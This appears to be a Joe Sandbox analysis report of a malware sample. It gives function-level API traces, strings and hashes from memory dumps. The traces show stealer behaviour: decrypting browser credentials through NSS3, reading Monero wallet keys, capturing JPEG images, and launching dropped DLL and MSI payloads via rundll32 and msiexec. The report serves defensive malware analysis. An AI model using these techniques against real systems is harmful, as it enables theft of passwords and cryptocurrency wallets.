Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d44c20679b9c4a756f93b7d5128fe0724361f8d422d0cc8dd05030c1362db5c2
Instruction ID: 796189beb0dfc36e2efc9b80657353642a7c0dd0f7f77940dcb3dd1cfd3a2e11
Opcode Fuzzy Hash: d44c20679b9c4a756f93b7d5128fe0724361f8d422d0cc8dd05030c1362db5c2
Instruction Fuzzy Hash: 4F41D3F36082049FE748EE6DDC9073AB7E9EB54710F1A483EE6C5C3780E63964448656

Function 00581932 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db68556be0afb6030172e2d06b7938bec4ae040aad144ad336bc8a6626c3959e
Instruction ID: 539e02803319318618bf99b5e841b36a29d7171acfdfda8e4cfc48a167a9bfaf
Opcode Fuzzy Hash: db68556be0afb6030172e2d06b7938bec4ae040aad144ad336bc8a6626c3959e
Instruction Fuzzy Hash: 353139B241C7189FE709BF69D8456BAFBE8EF18310F06492DE6D583640EA3168408BC7

Function 0052BA6E Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f89a4bf1c0ff66f9e3ca91808ff8bda61520f3e1c7919ecdbda152573b353bb9
Instruction ID: 83303dc050280ae50aa0a322b393687a444f864ecb3dd9c40eb9eb0316389ff3
Opcode Fuzzy Hash: f89a4bf1c0ff66f9e3ca91808ff8bda61520f3e1c7919ecdbda152573b353bb9
Instruction Fuzzy Hash: 3A31E4B240C6109FE315BF28D8866BEFBE4FF18710F06092DEAD693610D635A950CB87

Function 00109750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 000FC990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 000FC9A5

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00CDD108,00000000,?,0011144C,00000000,?,?), ref: 000FCA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 000FCA89
GetFileSize.KERNEL32(00000000,00000000), ref: 000FCA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000FCAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 000FCAD9
StrStrA.SHLWAPI(?,00CDD0D8,00110B52), ref: 000FCAF7
StrStrA.SHLWAPI(00000000,00CDD360), ref: 000FCB1E
StrStrA.SHLWAPI(?,00CDDB80,00000000,?,00111458,00000000,?,00000000,00000000,?,00CD8E90,00000000,?,00111454,00000000,?), ref: 000FCCA2
StrStrA.SHLWAPI(00000000,00CDDA00), ref: 000FCCB9

Part of subcall function 000FC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000FC871
Part of subcall function 000FC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000FC87C
Part of subcall function 000FC820: PK11_GetInternalKeySlot.NSS3 ref: 000FC88A
Part of subcall function 000FC820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 000FC8A5
Part of subcall function 000FC820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 000FC8EB
Part of subcall function 000FC820: PK11_FreeSlot.NSS3(?), ref: 000FC961

StrStrA.SHLWAPI(?,00CDDA00,00000000,?,0011145C,00000000,?,00000000,00CD9000), ref: 000FCD5A
StrStrA.SHLWAPI(00000000,00CD9140), ref: 000FCD71

Part of subcall function 000FC820: lstrcat.KERNEL32(?,00110B46), ref: 000FC943
Part of subcall function 000FC820: lstrcat.KERNEL32(?,00110B47), ref: 000FC957
Part of subcall function 000FC820: lstrcat.KERNEL32(?,00110B4E), ref: 000FC978

lstrlen.KERNEL32(00000000), ref: 000FCE44
CloseHandle.KERNEL32(00000000), ref: 000FCE9C
NSS_Shutdown.NSS3 ref: 000FCEAA

Strings

, xrefs: 000FC9C6

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: c4125809d9fc1b4ebdc9cdcb1727d1f33b553da1faab30e72cb5759c7eaa4fdb
Instruction ID: d7ceaa821b8f1472004cf0eae2236e10b8994bcd87496e5a8cbc89f2b62e88e6
Opcode Fuzzy Hash: c4125809d9fc1b4ebdc9cdcb1727d1f33b553da1faab30e72cb5759c7eaa4fdb
Instruction Fuzzy Hash: E1E11071D10208ABDB15EBA0DC96FEEB778AF24301F808159F146671D1EF706A4ACF62

Function 00109010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0010906C

Strings

image/jpeg, xrefs: 00109136

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: fb179c74cbce01b680bfed8fda9f7eb2dd9954fc06e921941a144b85dd9708b8
Instruction ID: a4c0412cb07ba7153384bfc344da5e6ba1f5e320957113d68e10f17b16c24dbb
Opcode Fuzzy Hash: fb179c74cbce01b680bfed8fda9f7eb2dd9954fc06e921941a144b85dd9708b8
Instruction Fuzzy Hash: 5471FA71A00608EBDB04DBE4DC99FEEB7BDBF48700F108508F655AB290DB75A905CB61

Function 001017A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 001017C5
ExitProcess.KERNEL32 ref: 001017D1

Strings

block, xrefs: 001017B7

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 8a3942a90f158f29f69a814414501e9f366c8c8ef21a96fe212961c60161f3a5
Instruction ID: 7dee3c2da659189023082256449761ecf57f45419a8c734c0c9306b758364f44
Opcode Fuzzy Hash: 8a3942a90f158f29f69a814414501e9f366c8c8ef21a96fe212961c60161f3a5
Instruction Fuzzy Hash: 255152B4A04209FFDB09DFA4D994ABE77B5BF44708F10805DE4866B280D7B4E991CB62

Function 00102E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

ShellExecuteEx.SHELL32(0000003C), ref: 001031C5
ShellExecuteEx.SHELL32(0000003C), ref: 0010335D
ShellExecuteEx.SHELL32(0000003C), ref: 001034EA

Strings

C:\Windows\system32\msiexec.exe, xrefs: 001034BF
.msi, xrefs: 00103398
C:\Windows\system32\rundll32.exe, xrefs: 00103332
"" , xrefs: 0010309A
<, xrefs: 00103490
.dll, xrefs: 001031E5
/passive, xrefs: 0010345B
/i ", xrefs: 001033E4

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
